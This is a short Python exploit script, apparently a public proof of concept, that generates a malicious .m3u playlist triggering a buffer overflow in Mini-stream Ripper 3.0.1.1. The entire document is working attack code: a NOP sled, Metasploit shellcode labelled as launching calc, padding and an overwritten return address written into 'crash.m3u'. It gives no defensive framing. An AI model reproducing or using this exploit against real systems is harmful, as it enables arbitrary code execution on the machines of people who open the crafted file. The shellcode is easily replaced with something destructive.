#!/usr/bin/env python #Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution #Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe #Author: l3D #Site: http://xraysecurity.blogspot.com #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com
nops1='\x90'*0x2a80 #system("calc") - Metasploit.com shellcode=("\xb8\x19\xfc\x3c\x9b\xd9\xc4\x31\xc9\xb1\x32\xd9\x74\x24\xf4" "\x5b\x83\xeb\xfc\x31\x43\x0e\x03\x5a\xf2\xde\x6e\xa0\xe2\x96" "\x91\x58\xf3\xc8\x18\xbd\xc2\xda\x7f\xb6\x77\xeb\xf4\x9a\x7b" "\x80\x59\x0e\x0f\xe4\x75\x21\xb8\x43\xa0\x0c\x39\x62\x6c\xc2" "\xf9\xe4\x10\x18\x2e\xc7\x29\xd3\x23\x06\x6d\x09\xcb\x5a\x26" "\x46\x7e\x4b\x43\x1a\x43\x6a\x83\x11\xfb\x14\xa6\xe5\x88\xae" "\xa9\x35\x20\xa4\xe2\xad\x4a\xe2\xd2\xcc\x9f\xf0\x2f\x87\x94" "\xc3\xc4\x16\x7d\x1a\x24\x29\x41\xf1\x1b\x86\x4c\x0b\x5b\x20" "\xaf\x7e\x97\x53\x52\x79\x6c\x2e\x88\x0c\x71\x88\x5b\xb6\x51" "\x29\x8f\x21\x11\x25\x64\x25\x7d\x29\x7b\xea\xf5\x55\xf0\x0d" "\xda\xdc\x42\x2a\xfe\x85\x11\x53\xa7\x63\xf7\x6c\xb7\xcb\xa8" "\xc8\xb3\xf9\xbd\x6b\x9e\x97\x40\xf9\xa4\xde\x43\x01\xa7\x70" "\x2c\x30\x2c\x1f\x2b\xcd\xe7\x64\xc3\x87\xaa\xcc\x4c\x4e\x3f" "\x4d\x11\x71\x95\x91\x2c\xf2\x1c\x69\xcb\xea\x54\x6c\x97\xac" "\x85\x1c\x88\x58\xaa\xb3\xa9\x48\xc9\x52\x3a\x10\x0e") nops2='\x90'*(0xa9ff-len(nops1+shellcode)) ret='\x30\x3D\x0D' payload=nops1+shellcode+nops2+ret
evil="""<ASX Version="3.0"> <ENTRY> <REF HREF="%s"/> </ENTRY> </ASX> """ % payload
bad=open('crash.m3u', 'w') bad.write(evil) bad.close()
|